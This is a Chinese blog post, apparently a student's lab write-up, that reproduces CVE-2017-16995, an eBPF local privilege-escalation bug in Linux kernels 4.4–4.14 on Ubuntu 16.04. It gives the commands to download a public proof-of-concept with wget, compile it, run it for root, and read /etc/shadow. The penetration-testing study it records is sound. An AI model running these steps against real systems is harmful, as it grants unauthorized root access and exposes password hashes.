CVE-2017-16995漏洞复现


Ubuntu16.04存在本地提权漏洞,该漏洞存在于Linux内核带有的eBPF bpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题。攻击者(普通用户)可以利用该漏洞进行提权攻击,获取root权限,危害极大。

这是我在实验室学习渗透测试所做的第十五个漏洞复现,非常简单。

这么久没有更新是因为前段时间感冒发烧,被带去隔离了,这两天才好了一点。

影响版本

Linux内核:Linux Kernel Version 4.14 ~ 4.4
Ubuntu版本:16.04.01~ 16.04.04

实验环境

Ubuntu 16.04.1 LTS

复现过程

1. 查看内核与权限,下载POC

id # 查看本地用户组权限
cat /proc/version # 查看Linux内核版本,漏洞存在于Linux Kernel Version 4.14~4.4,Ubuntu 16.04.1~16.04.04
wget http://cyseclabs.com/pub/upstream44.c # 下载POC代码

2. 使用gcc编译POC

若未安装gcc,首先安装gcc,然后使用gcc对upstream44.c进行编译,并给予执行权限。

gcc -o test upstream44.c
chmod +x test

3. 本地提权

执行test文件,实现本地提权。

./test
id
cat /etc/shadow

可以看到,当前用户已由原来的zxy变为了root,本地提权成功。


文章作者: 恰醋
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 恰醋 !
评论
 上一篇
CVE-2020-7471 Django SQL注入漏洞复现 CVE-2020-7471 Django SQL注入漏洞复现
2020年2月3日,Django 官方发布安全通告公布了一个通过StringAgg(分隔符)实现利用的潜在SQL注入漏洞(CVE-2020-7471)。
2020-10-04
下一篇 
CVE-2016-5195漏洞复现 CVE-2016-5195漏洞复现
Linux内核的内存子系统在处理写和拷贝时存在条件竞争漏洞,导致可以破快破坏私有只读内存映射。一个低权限的本地用户能够利用此漏洞获取其他只读内存映射的权限,实现本地提权。
2020-09-25
  目录